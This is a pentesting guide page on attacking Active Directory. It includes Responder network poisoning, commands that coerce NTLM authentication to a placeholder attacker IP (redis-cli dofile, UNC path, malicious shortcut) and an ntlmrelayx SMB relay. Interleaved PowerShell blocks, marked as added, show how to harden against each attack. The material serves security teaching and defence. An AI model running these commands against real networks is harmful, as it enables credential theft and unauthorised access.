The Pentesting Guide

Active Directory

Last updated 1 year ago

Introduction

Active Directory (AD) lets network administrators manage the computers, services and users of a domain, and control how they interact with each other.

The data is stored in a hierarchical structure consisting of five main components: Objects, Organizational Units, domains, trees, and forests.

  • Object: An object is an essential element in AD that represents a user, a group, a computer, an application, a printer, or a shared folder.

  • Organizational Unit (OU): An Organizational Unit is an object that acts as a "directory" of objects. It can also contain other organizational units.

  • Domain: A domain represents a group of objects which share the same AD database (AD DB).

  • Tree: A tree is a collection of one or more domains in a contiguous namespace. For instance, "uk.example.com" and "es.example.com" are in the same tree.

  • Forest: A forest is a collection of trees whose domains trust each other and share a common directory schema, application information and configuration.

Finally, Active Directory is a combination of services:

  • Domain Services: The primary function is to store the directory data and manage communication between users and the domain controller (DC).

  • Certificate Services: Creates, manages and shares encryption certificates for exchanging information securely over the internet.

  • Lightweight Directory Services: Supports LDAP for cross-platform domain services.

  • Active Directory Federation Services: Provides users with Single Sign-On (SSO) authentication to access multiple applications in the same session, so users do not have to provide the same credentials repeatedly.

  • Rights Management: Controls information rights and data access policies. It also encrypts the content, such as documents or emails.

Enumeration

Since Active Directory is a set of services, a domain can expose services such as SMTP, web and SMB that an attacker will have to exploit to obtain credentials or access to a system. There are cheatsheets and mindmaps (see References) that can be followed to gather information.

In any case, a good starting point is to gather information about the DNS, SMB, LDAP and Kerberos services.

Poison the network

With the tool Responder, an attacker can poison the network name-resolution protocols (LLMNR, NBT-NS and mDNS) so that victims resolve names to the attacker's machine and connect to it. If the resource the host asked for requires authentication, the username and its NTLMv2 response ("hash") are sent to the attacker. The captured hashes can then be cracked offline and the recovered passwords used to access the poisoned victims' machines.

sudo responder -I <NETWORK_INTERFACE> -Prdwv 
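The three protocols Responder poisons are all fallbacks that a correctly populated DNS makes unnecessary, so the standard mitigation is to switch them off on every domain host. The PowerShell below is an added hardening and verification example, not part of the original guide: it writes the registry values behind the "Turn off multicast name resolution" policy (LLMNR), the per-adapter NetBIOS setting and the mDNS switch, then reads them back. It assumes an elevated session on a single host; in a domain the same values are pushed through Group Policy.

```powershell
# Added example (not from the guide): disable LLMNR, NetBIOS-NS and mDNS, the three
# protocols Responder poisons, then report the resulting state. Run as Administrator.

$DnsClientPolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'
$NetBtInterfacesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$DnsCacheParamsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters'

function Disable-PoisonableNameResolution {
    # LLMNR: the same value the "Turn off multicast name resolution" GPO sets.
    New-Item -Path $DnsClientPolicyKey -Force | Out-Null
    Set-ItemProperty -Path $DnsClientPolicyKey -Name 'EnableMulticast' -Type DWord -Value 0

    # NetBIOS over TCP/IP: NetbiosOptions 2 = "Disable NetBIOS" on every adapter
    # (one Tcpip_{GUID} subkey each). Takes effect after a reboot or adapter reset.
    Get-ChildItem -Path $NetBtInterfacesKey | ForEach-Object {
        Set-ItemProperty -Path $_.PSPath -Name 'NetbiosOptions' -Type DWord -Value 2
    }

    # mDNS: EnableMDNS = 0 stops the DNS client issuing and answering multicast DNS.
    Set-ItemProperty -Path $DnsCacheParamsKey -Name 'EnableMDNS' -Type DWord -Value 0
}

function Get-PoisonableNameResolutionStatus {
    # $true per protocol only when the hardened value is actually present.
    $llmnr = (Get-ItemProperty -Path $DnsClientPolicyKey -ErrorAction SilentlyContinue).EnableMulticast
    $mdns  = (Get-ItemProperty -Path $DnsCacheParamsKey  -ErrorAction SilentlyContinue).EnableMDNS
    $netbtLeft = Get-ChildItem -Path $NetBtInterfacesKey | Where-Object {
        (Get-ItemProperty -Path $_.PSPath).NetbiosOptions -ne 2
    }
    [PSCustomObject]@{
        LlmnrDisabled              = ($llmnr -eq 0)
        MdnsDisabled               = ($mdns -eq 0)
        NetbiosDisabledAllAdapters = (@($netbtLeft).Count -eq 0)
    }
}

Disable-PoisonableNameResolution
Get-PoisonableNameResolutionStatus
```

Check beforehand that every name the hosts rely on resolves through DNS, since after this change a mistyped or unregistered name simply fails instead of being broadcast; disabling NetBIOS also breaks legacy SMB browsing that still depends on it.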

Triggering responder

If an attacker has RCE on a service that runs under an AD account, or wants to use social engineering, here are some ways to make the victim authenticate to Responder and obtain NTLM hashes.

Redis

redis-cli -h <IP> -p <PORT> eval "dofile('//<ATTACKER_IP>//share')" 0

CMD

Through the CLI you can access the responder server in order to obtain the user's NTLM hash.

C:\Users\victim> \\<ATTACKER_IP>\

Windows shortcut

You can create Windows shortcuts with mslink.sh (see References) that retrieve the NTLM hash once the victim clicks on them.

./mslink_v1.3.sh -l name -n shortcut -i \\\\<ATTACKER_IP>\\a -o out.lnk
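All three tips rely on the victim silently sending NTLM to a name the attacker controls, so a defender wants to know which hosts still send outgoing NTLM, and to whom, before restricting it. The PowerShell below is an added example, not from the guide: it sets the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy to audit mode through its registry value, reads back the resulting audit events, and provides the deny setting with a server exception list. The server name in the usage comment is an invented placeholder.

```powershell
# Added example (not from the guide): audit, then restrict, outgoing NTLM so that a UNC
# path or a Redis dofile() pointing at an untrusted host cannot silently leak a NetNTLMv2
# response. Run as Administrator; in a domain, set the same policy via GPO.

$Msv1Key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'

function Enable-OutgoingNtlmAudit {
    # RestrictSendingNTLMTraffic: 0 = allow all, 1 = audit all, 2 = deny all.
    # Audit mode keeps NTLM working but records every outgoing attempt as event 8001 in
    # the Microsoft-Windows-NTLM/Operational log, which is how the exception list is built.
    Set-ItemProperty -Path $Msv1Key -Name 'RestrictSendingNTLMTraffic' -Type DWord -Value 1
    # Make sure the operational log is enabled so the 8001 events are actually written.
    wevtutil.exe set-log 'Microsoft-Windows-NTLM/Operational' /enabled:true
}

function Get-OutgoingNtlmAudit {
    param([int]$MaxEvents = 50)
    # Each 8001 event names the remote server the client tried to authenticate to and the
    # process that triggered it; an unknown server here is exactly the leak the tips above cause.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-NTLM/Operational'; Id = 8001 } `
        -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { [PSCustomObject]@{ Time = $_.TimeCreated; Message = $_.Message } }
}

function Set-OutgoingNtlmDenyPolicy {
    param([string[]]$AllowedServers)
    # Exceptions first, so the deny does not break servers that genuinely only speak NTLM.
    Set-ItemProperty -Path $Msv1Key -Name 'ClientAllowedNTLMServers' -Type MultiString -Value $AllowedServers
    Set-ItemProperty -Path $Msv1Key -Name 'RestrictSendingNTLMTraffic' -Type DWord -Value 2
}

Enable-OutgoingNtlmAudit
Get-OutgoingNtlmAudit
# After reviewing the audit output for a few weeks (placeholder server name):
# Set-OutgoingNtlmDenyPolicy -AllowedServers @('fileserver01.example.local')
```

Run the audit step first and leave it for long enough to see every legitimate NTLM-only dependency; flipping straight to deny is what breaks printers, NAS boxes and old line-of-business servers. The policy applies to service accounts too, so a Windows service coerced into opening a UNC path is covered as well.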

SMB Relay Attack

In an SMB relay attack, an attacker captures a user's NTLM authentication (the NetNTLMv2 response) and relays it to another machine on the network to gain a remote shell or file access.

This attack only works if SMB signing is not required on the target; you can check that by running the following command against the victim machine.

nmap --script=smb2-security-mode.nse -p445 -Pn <VICTIMS_IP>

If "Message signing enabled but not required" appears in the result, the machine is vulnerable.

Turn off SMB in the Responder configuration as NTLMRelayX will be handling SMB.

sudo sed -i 's/SMB = On/SMB = Off/' /etc/responder/Responder.conf
responder.py -I eth0 -wdr -v

Then run the Impacket tool ntlmrelayx, which waits for Responder to capture an NTLM authentication and relays it to the target to obtain an interactive shell.

ntlmrelayx -tf <TARGET> -smb2support -i
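The nmap check above reads the server-side signing flags that Windows exposes through its SMB server configuration: "Message signing enabled but not required" is EnableSecuritySignature true with RequireSecuritySignature false, which is the default on member servers and workstations (domain controllers require signing by default). The PowerShell below is an added audit-and-remediation example, not part of the guide: it reports the local flags in the same terms as the nmap result and then requires signing on both the server and the client side. It assumes the SmbShare module (Windows 8 / Server 2012 and later) and an elevated session; the two disabled-state labels are my own wording, only the middle one is the string the page quotes.

```powershell
# Added example (not from the guide): audit the local SMB signing flags, map them to the
# wording the guide's nmap check uses, and enforce signing. Run as Administrator.

function Get-SmbSigningStatus {
    $server = Get-SmbServerConfiguration
    $client = Get-SmbClientConfiguration

    # Three server-side states; the middle string is the one the nmap output shows
    # when the host is a usable relay target.
    $serverState = if ($server.RequireSecuritySignature) { 'Message signing enabled and required' }
                   elseif ($server.EnableSecuritySignature) { 'Message signing enabled but not required' }
                   else { 'Message signing disabled' }

    [PSCustomObject]@{
        ServerState           = $serverState
        RelayableAsTarget     = -not $server.RequireSecuritySignature   # ntlmrelayx -tf could list this host
        ClientSigningRequired = $client.RequireSecuritySignature       # client refuses servers that will not sign
    }
}

function Set-SmbSigningRequired {
    # Server side: reject any session that is not signed. A relayed authentication cannot
    # be signed by the relay, which never learns the session key, so it is refused.
    Set-SmbServerConfiguration -EnableSecuritySignature $true -RequireSecuritySignature $true -Force
    # Client side: never accept an unsigned session from a server either.
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    Get-SmbSigningStatus
}

Get-SmbSigningStatus
# Set-SmbSigningRequired   # uncomment to enforce; the domain-wide equivalent is the GPO
#                          # "Microsoft network server: Digitally sign communications (always)"
```

Requiring signing adds a small CPU cost per SMB packet, which is why it is off by default on non-DC hosts; on the network side, a relay shows up as a type 3 logon whose source address is not the workstation the user normally authenticates from.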

References

  • Windows/AD cheatsheet environments cheatsheet
  • Pentesting AD MindMap
  • Active Directory Methodology
  • Pentesting Active Directory
  • Active Directory Exploitation Cheat Sheet
  • SMB Relay Attack
  • What is Active Directory and how does it work?
  • Active Directory Domain Services
  • Gaining Credentials Easily with Responder Tool
  • AD Object structure